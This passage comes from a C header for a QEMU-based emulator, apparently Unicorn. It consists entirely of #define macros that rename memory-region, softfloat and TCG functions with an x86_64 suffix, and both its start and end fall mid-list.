cpu_physical_memory_map cpu_physical_memory_map_x86_64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_x86_64 #define cpu_memory_rw_debug cpu_memory_rw_debug_x86_64 #define qemu_target_page_size qemu_target_page_size_x86_64 #define qemu_target_page_bits qemu_target_page_bits_x86_64 #define qemu_target_page_bits_min qemu_target_page_bits_min_x86_64 #define target_words_bigendian target_words_bigendian_x86_64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_x86_64 #define ram_block_discard_range ram_block_discard_range_x86_64 #define ramblock_is_pmem ramblock_is_pmem_x86_64 #define page_size_init page_size_init_x86_64 #define set_preferred_target_page_bits set_preferred_target_page_bits_x86_64 #define finalize_target_page_bits finalize_target_page_bits_x86_64 #define cpu_outb cpu_outb_x86_64 #define cpu_outw cpu_outw_x86_64 #define cpu_outl cpu_outl_x86_64 #define cpu_inb cpu_inb_x86_64 #define cpu_inw cpu_inw_x86_64 #define cpu_inl cpu_inl_x86_64 #define memory_map memory_map_x86_64 #define memory_map_io memory_map_io_x86_64 #define memory_map_ptr memory_map_ptr_x86_64 #define memory_cow memory_cow_x86_64 #define memory_unmap memory_unmap_x86_64 #define memory_moveout memory_moveout_x86_64 #define memory_movein memory_movein_x86_64 #define memory_free memory_free_x86_64 #define flatview_unref flatview_unref_x86_64 #define address_space_get_flatview address_space_get_flatview_x86_64 #define memory_region_transaction_begin memory_region_transaction_begin_x86_64 #define memory_region_transaction_commit memory_region_transaction_commit_x86_64 #define memory_region_init memory_region_init_x86_64 #define memory_region_access_valid memory_region_access_valid_x86_64 #define memory_region_dispatch_read memory_region_dispatch_read_x86_64 #define memory_region_dispatch_write memory_region_dispatch_write_x86_64 #define memory_region_init_io memory_region_init_io_x86_64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_x86_64 #define memory_region_size memory_region_size_x86_64 #define memory_region_set_readonly memory_region_set_readonly_x86_64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_x86_64 #define memory_region_from_host memory_region_from_host_x86_64 #define memory_region_get_ram_addr memory_region_get_ram_addr_x86_64 #define memory_region_add_subregion memory_region_add_subregion_x86_64 #define memory_region_del_subregion memory_region_del_subregion_x86_64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_x86_64 #define memory_region_find memory_region_find_x86_64 #define memory_region_filter_subregions memory_region_filter_subregions_x86_64 #define memory_listener_register memory_listener_register_x86_64 #define memory_listener_unregister memory_listener_unregister_x86_64 #define address_space_remove_listeners address_space_remove_listeners_x86_64 #define address_space_init address_space_init_x86_64 #define address_space_destroy address_space_destroy_x86_64 #define memory_region_init_ram memory_region_init_ram_x86_64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_x86_64 #define find_memory_mapping find_memory_mapping_x86_64 #define exec_inline_op exec_inline_op_x86_64 #define floatx80_default_nan floatx80_default_nan_x86_64 #define float_raise float_raise_x86_64 #define float16_is_quiet_nan float16_is_quiet_nan_x86_64 #define float16_is_signaling_nan float16_is_signaling_nan_x86_64 #define float32_is_quiet_nan float32_is_quiet_nan_x86_64 #define float32_is_signaling_nan 
float32_is_signaling_nan_x86_64 #define float64_is_quiet_nan float64_is_quiet_nan_x86_64 #define float64_is_signaling_nan float64_is_signaling_nan_x86_64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_x86_64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_x86_64 #define floatx80_silence_nan floatx80_silence_nan_x86_64 #define propagateFloatx80NaN propagateFloatx80NaN_x86_64 #define float128_is_quiet_nan float128_is_quiet_nan_x86_64 #define float128_is_signaling_nan float128_is_signaling_nan_x86_64 #define float128_silence_nan float128_silence_nan_x86_64 #define float16_add float16_add_x86_64 #define float16_sub float16_sub_x86_64 #define float32_add float32_add_x86_64 #define float32_sub float32_sub_x86_64 #define float64_add float64_add_x86_64 #define float64_sub float64_sub_x86_64 #define float16_mul float16_mul_x86_64 #define float32_mul float32_mul_x86_64 #define float64_mul float64_mul_x86_64 #define float16_muladd float16_muladd_x86_64 #define float32_muladd float32_muladd_x86_64 #define float64_muladd float64_muladd_x86_64 #define float16_div float16_div_x86_64 #define float32_div float32_div_x86_64 #define float64_div float64_div_x86_64 #define float16_to_float32 float16_to_float32_x86_64 #define float16_to_float64 float16_to_float64_x86_64 #define float32_to_float16 float32_to_float16_x86_64 #define float32_to_float64 float32_to_float64_x86_64 #define float64_to_float16 float64_to_float16_x86_64 #define float64_to_float32 float64_to_float32_x86_64 #define float16_round_to_int float16_round_to_int_x86_64 #define float32_round_to_int float32_round_to_int_x86_64 #define float64_round_to_int float64_round_to_int_x86_64 #define float16_to_int16_scalbn float16_to_int16_scalbn_x86_64 #define float16_to_int32_scalbn float16_to_int32_scalbn_x86_64 #define float16_to_int64_scalbn float16_to_int64_scalbn_x86_64 #define float32_to_int16_scalbn float32_to_int16_scalbn_x86_64 #define float32_to_int32_scalbn float32_to_int32_scalbn_x86_64 #define float32_to_int64_scalbn float32_to_int64_scalbn_x86_64 #define float64_to_int16_scalbn float64_to_int16_scalbn_x86_64 #define float64_to_int32_scalbn float64_to_int32_scalbn_x86_64 #define float64_to_int64_scalbn float64_to_int64_scalbn_x86_64 #define float16_to_int16 float16_to_int16_x86_64 #define float16_to_int32 float16_to_int32_x86_64 #define float16_to_int64 float16_to_int64_x86_64 #define float32_to_int16 float32_to_int16_x86_64 #define float32_to_int32 float32_to_int32_x86_64 #define float32_to_int64 float32_to_int64_x86_64 #define float64_to_int16 float64_to_int16_x86_64 #define float64_to_int32 float64_to_int32_x86_64 #define float64_to_int64 float64_to_int64_x86_64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_x86_64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_x86_64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_x86_64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_x86_64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_x86_64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_x86_64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_x86_64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_x86_64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_x86_64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_x86_64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_x86_64 #define float16_to_uint64_scalbn 
float16_to_uint64_scalbn_x86_64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_x86_64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_x86_64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_x86_64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_x86_64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_x86_64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_x86_64 #define float16_to_uint16 float16_to_uint16_x86_64 #define float16_to_uint32 float16_to_uint32_x86_64 #define float16_to_uint64 float16_to_uint64_x86_64 #define float32_to_uint16 float32_to_uint16_x86_64 #define float32_to_uint32 float32_to_uint32_x86_64 #define float32_to_uint64 float32_to_uint64_x86_64 #define float64_to_uint16 float64_to_uint16_x86_64 #define float64_to_uint32 float64_to_uint32_x86_64 #define float64_to_uint64 float64_to_uint64_x86_64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_x86_64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_x86_64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_x86_64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_x86_64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_x86_64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_x86_64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_x86_64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_x86_64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_x86_64 #define int64_to_float16_scalbn int64_to_float16_scalbn_x86_64 #define int32_to_float16_scalbn int32_to_float16_scalbn_x86_64 #define int16_to_float16_scalbn int16_to_float16_scalbn_x86_64 #define int64_to_float16 int64_to_float16_x86_64 #define int32_to_float16 int32_to_float16_x86_64 #define int16_to_float16 int16_to_float16_x86_64 #define int64_to_float32_scalbn int64_to_float32_scalbn_x86_64 #define int32_to_float32_scalbn int32_to_float32_scalbn_x86_64 #define int16_to_float32_scalbn int16_to_float32_scalbn_x86_64 #define int64_to_float32 int64_to_float32_x86_64 #define int32_to_float32 int32_to_float32_x86_64 #define int16_to_float32 int16_to_float32_x86_64 #define int64_to_float64_scalbn int64_to_float64_scalbn_x86_64 #define int32_to_float64_scalbn int32_to_float64_scalbn_x86_64 #define int16_to_float64_scalbn int16_to_float64_scalbn_x86_64 #define int64_to_float64 int64_to_float64_x86_64 #define int32_to_float64 int32_to_float64_x86_64 #define int16_to_float64 int16_to_float64_x86_64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_x86_64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_x86_64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_x86_64 #define uint64_to_float16 uint64_to_float16_x86_64 #define uint32_to_float16 uint32_to_float16_x86_64 #define uint16_to_float16 uint16_to_float16_x86_64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_x86_64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_x86_64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_x86_64 #define uint64_to_float32 uint64_to_float32_x86_64 #define uint32_to_float32 uint32_to_float32_x86_64 #define uint16_to_float32 uint16_to_float32_x86_64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_x86_64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_x86_64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_x86_64 #define uint64_to_float64 uint64_to_float64_x86_64 #define 
uint32_to_float64 uint32_to_float64_x86_64 #define uint16_to_float64 uint16_to_float64_x86_64 #define float16_min float16_min_x86_64 #define float16_minnum float16_minnum_x86_64 #define float16_minnummag float16_minnummag_x86_64 #define float16_max float16_max_x86_64 #define float16_maxnum float16_maxnum_x86_64 #define float16_maxnummag float16_maxnummag_x86_64 #define float32_min float32_min_x86_64 #define float32_minnum float32_minnum_x86_64 #define float32_minnummag float32_minnummag_x86_64 #define float32_max float32_max_x86_64 #define float32_maxnum float32_maxnum_x86_64 #define float32_maxnummag float32_maxnummag_x86_64 #define float64_min float64_min_x86_64 #define float64_minnum float64_minnum_x86_64 #define float64_minnummag float64_minnummag_x86_64 #define float64_max float64_max_x86_64 #define float64_maxnum float64_maxnum_x86_64 #define float64_maxnummag float64_maxnummag_x86_64 #define float16_compare float16_compare_x86_64 #define float16_compare_quiet float16_compare_quiet_x86_64 #define float32_compare float32_compare_x86_64 #define float32_compare_quiet float32_compare_quiet_x86_64 #define float64_compare float64_compare_x86_64 #define float64_compare_quiet float64_compare_quiet_x86_64 #define float16_scalbn float16_scalbn_x86_64 #define float32_scalbn float32_scalbn_x86_64 #define float64_scalbn float64_scalbn_x86_64 #define float16_sqrt float16_sqrt_x86_64 #define float32_sqrt float32_sqrt_x86_64 #define float64_sqrt float64_sqrt_x86_64 #define float16_default_nan float16_default_nan_x86_64 #define float32_default_nan float32_default_nan_x86_64 #define float64_default_nan float64_default_nan_x86_64 #define float128_default_nan float128_default_nan_x86_64 #define float16_silence_nan float16_silence_nan_x86_64 #define float32_silence_nan float32_silence_nan_x86_64 #define float64_silence_nan float64_silence_nan_x86_64 #define float16_squash_input_denormal float16_squash_input_denormal_x86_64 #define float32_squash_input_denormal float32_squash_input_denormal_x86_64 #define float64_squash_input_denormal float64_squash_input_denormal_x86_64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_x86_64 #define roundAndPackFloatx80 roundAndPackFloatx80_x86_64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_x86_64 #define int32_to_floatx80 int32_to_floatx80_x86_64 #define int32_to_float128 int32_to_float128_x86_64 #define int64_to_floatx80 int64_to_floatx80_x86_64 #define int64_to_float128 int64_to_float128_x86_64 #define uint64_to_float128 uint64_to_float128_x86_64 #define float32_to_floatx80 float32_to_floatx80_x86_64 #define float32_to_float128 float32_to_float128_x86_64 #define float32_rem float32_rem_x86_64 #define float32_exp2 float32_exp2_x86_64 #define float32_log2 float32_log2_x86_64 #define float32_eq float32_eq_x86_64 #define float32_le float32_le_x86_64 #define float32_lt float32_lt_x86_64 #define float32_unordered float32_unordered_x86_64 #define float32_eq_quiet float32_eq_quiet_x86_64 #define float32_le_quiet float32_le_quiet_x86_64 #define float32_lt_quiet float32_lt_quiet_x86_64 #define float32_unordered_quiet float32_unordered_quiet_x86_64 #define float64_to_floatx80 float64_to_floatx80_x86_64 #define float64_to_float128 float64_to_float128_x86_64 #define float64_rem float64_rem_x86_64 #define float64_log2 float64_log2_x86_64 #define float64_eq float64_eq_x86_64 #define float64_le float64_le_x86_64 #define float64_lt float64_lt_x86_64 #define float64_unordered float64_unordered_x86_64 #define float64_eq_quiet float64_eq_quiet_x86_64 
#define float64_le_quiet float64_le_quiet_x86_64 #define float64_lt_quiet float64_lt_quiet_x86_64 #define float64_unordered_quiet float64_unordered_quiet_x86_64 #define floatx80_to_int32 floatx80_to_int32_x86_64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_x86_64 #define floatx80_to_int64 floatx80_to_int64_x86_64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_x86_64 #define floatx80_to_float32 floatx80_to_float32_x86_64 #define floatx80_to_float64 floatx80_to_float64_x86_64 #define floatx80_to_float128 floatx80_to_float128_x86_64 #define floatx80_round floatx80_round_x86_64 #define floatx80_round_to_int floatx80_round_to_int_x86_64 #define floatx80_add floatx80_add_x86_64 #define floatx80_sub floatx80_sub_x86_64 #define floatx80_mul floatx80_mul_x86_64 #define floatx80_div floatx80_div_x86_64 #define floatx80_rem floatx80_rem_x86_64 #define floatx80_sqrt floatx80_sqrt_x86_64 #define floatx80_eq floatx80_eq_x86_64 #define floatx80_le floatx80_le_x86_64 #define floatx80_lt floatx80_lt_x86_64 #define floatx80_unordered floatx80_unordered_x86_64 #define floatx80_eq_quiet floatx80_eq_quiet_x86_64 #define floatx80_le_quiet floatx80_le_quiet_x86_64 #define floatx80_lt_quiet floatx80_lt_quiet_x86_64 #define floatx80_unordered_quiet floatx80_unordered_quiet_x86_64 #define float128_to_int32 float128_to_int32_x86_64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_x86_64 #define float128_to_int64 float128_to_int64_x86_64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_x86_64 #define float128_to_uint64 float128_to_uint64_x86_64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_x86_64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_x86_64 #define float128_to_uint32 float128_to_uint32_x86_64 #define float128_to_float32 float128_to_float32_x86_64 #define float128_to_float64 float128_to_float64_x86_64 #define float128_to_floatx80 float128_to_floatx80_x86_64 #define float128_round_to_int float128_round_to_int_x86_64 #define float128_add float128_add_x86_64 #define float128_sub float128_sub_x86_64 #define float128_mul float128_mul_x86_64 #define float128_div float128_div_x86_64 #define float128_rem float128_rem_x86_64 #define float128_sqrt float128_sqrt_x86_64 #define float128_eq float128_eq_x86_64 #define float128_le float128_le_x86_64 #define float128_lt float128_lt_x86_64 #define float128_unordered float128_unordered_x86_64 #define float128_eq_quiet float128_eq_quiet_x86_64 #define float128_le_quiet float128_le_quiet_x86_64 #define float128_lt_quiet float128_lt_quiet_x86_64 #define float128_unordered_quiet float128_unordered_quiet_x86_64 #define floatx80_compare floatx80_compare_x86_64 #define floatx80_compare_quiet floatx80_compare_quiet_x86_64 #define float128_compare float128_compare_x86_64 #define float128_compare_quiet float128_compare_quiet_x86_64 #define floatx80_scalbn floatx80_scalbn_x86_64 #define float128_scalbn float128_scalbn_x86_64 #define softfloat_init softfloat_init_x86_64 #define tcg_optimize tcg_optimize_x86_64 #define gen_new_label gen_new_label_x86_64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_x86_64 #define tcg_expand_vec_op tcg_expand_vec_op_x86_64 #define tcg_register_jit tcg_register_jit_x86_64 #define tcg_tb_insert tcg_tb_insert_x86_64 #define tcg_tb_remove tcg_tb_remove_x86_64 #define tcg_tb_lookup tcg_tb_lookup_x86_64 #define tcg_tb_foreach tcg_tb_foreach_x86_64 #define tcg_nb_tbs tcg_nb_tbs_x86_64 #define 
tcg_region_reset_all tcg_region_reset_all_x86_64 #define tcg_region_init tcg_region_init_x86_64 #define tcg_code_size tcg_code_size_x86_64 #define tcg_code_capacity tcg_code_capacity_x86_64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_x86_64 #define tcg_malloc_internal tcg_malloc_internal_x86_64 #define tcg_pool_reset tcg_pool_reset_x86_64 #define tcg_context_init tcg_context_init_x86_64 #define tcg_tb_alloc tcg_tb_alloc_x86_64 #define tcg_prologue_init tcg_prologue_init_x86_64 #define tcg_func_start tcg_func_start_x86_64 #define tcg_set_frame tcg_set_frame_x86_64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_x86_64 #define tcg_temp_new_internal tcg_temp_new_internal_x86_64 #define tcg_temp_new_vec tcg_temp_new_vec_x86_64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_x86_64 #define tcg_temp_free_internal tcg_temp_free_internal_x86_64 #define tcg_const_i32 tcg_const_i32_x86_64 #define tcg_const_i64 tcg_const_i64_x86_64 #define tcg_const_local_i32 tcg_const_local_i32_x86_64 #define tcg_const_local_i64 tcg_const_local_i64_x86_64 #define tcg_op_supported tcg_op_supported_x86_64 #define tcg_gen_callN tcg_gen_callN_x86_64 #define tcg_op_remove tcg_op_remove_x86_64 #define tcg_emit_op tcg_emit_op_x86_64 #define tcg_op_insert_before tcg_op_insert_before_x86_64 #define tcg_op_insert_after tcg_op_insert_after_x86_64 #define tcg_cpu_exec_time tcg_cpu_exec_time_x86_64 #define tcg_gen_code tcg_gen_code_x86_64 #define tcg_gen_op1 tcg_gen_op1_x86_64 #define tcg_gen_op2 tcg_gen_op2_x86_64 #define tcg_gen_op3 tcg_gen_op3_x86_64 #define tcg_gen_op4 tcg_gen_op4_x86_64 #define tcg_gen_op5 tcg_gen_op5_x86_64 #define tcg_gen_op6 tcg_gen_op6_x86_64 #define tcg_gen_mb tcg_gen_mb_x86_64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_x86_64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_x86_64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_x86_64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_x86_64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_x86_64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_x86_64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_x86_64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_x86_64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_x86_64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_x86_64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_x86_64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_x86_64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_x86_64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_x86_64 #define tcg_gen_div_i32 tcg_gen_div_i32_x86_64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_x86_64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_x86_64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_x86_64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_x86_64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_x86_64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_x86_64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_x86_64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_x86_64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_x86_64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_x86_64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_x86_64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_x86_64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_x86_64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_x86_64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_x86_64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_x86_64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_x86_64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_x86_64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_x86_64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_x86_64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_x86_64 
#define tcg_gen_sextract_i32 tcg_gen_sextract_i32_x86_64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_x86_64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_x86_64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_x86_64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_x86_64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_x86_64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_x86_64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_x86_64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_x86_64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_x86_64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_x86_64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_x86_64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_x86_64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_x86_64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_x86_64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_x86_64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_x86_64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_x86_64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_x86_64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_x86_64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_x86_64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_x86_64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_x86_64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_x86_64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_x86_64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_x86_64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_x86_64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_x86_64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_x86_64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_x86_64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_x86_64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_x86_64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_x86_64 #define tcg_gen_div_i64 tcg_gen_div_i64_x86_64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_x86_64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_x86_64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_x86_64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_x86_64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_x86_64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_x86_64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_x86_64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_x86_64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_x86_64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_x86_64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_x86_64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_x86_64 #define tcg_gen_not_i64 tcg_gen_not_i64_x86_64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_x86_64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_x86_64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_x86_64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_x86_64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_x86_64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_x86_64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_x86_64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_x86_64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_x86_64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_x86_64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_x86_64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_x86_64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_x86_64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_x86_64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_x86_64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_x86_64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_x86_64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_x86_64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_x86_64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_x86_64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_x86_64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_x86_64 #define 
tcg_gen_sub2_i64 tcg_gen_sub2_i64_x86_64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_x86_64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_x86_64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_x86_64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_x86_64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_x86_64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_x86_64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_x86_64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_x86_64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_x86_64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_x86_64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_x86_64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_x86_64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_x86_64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_x86_64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_x86_64 #define tcg_gen_exit_tb tcg_gen_exit_tb_x86_64 #define tcg_gen_goto_tb tcg_gen_goto_tb_x86_64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_x86_64 #define check_exit_request check_exit_request_x86_64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_x86_64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_x86_64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_x86_64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_x86_64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_x86_64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_x86_64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_x86_64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_x86_64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_x86_64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_x86_64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_x86_64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_x86_64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_x86_64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_x86_64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_x86_64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_x86_64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_x86_64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_x86_64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_x86_64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_x86_64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_x86_64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_x86_64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_x86_64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_x86_64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_x86_64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_x86_64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_x86_64 #define tcg_gen_atomic_or_fetch_i64 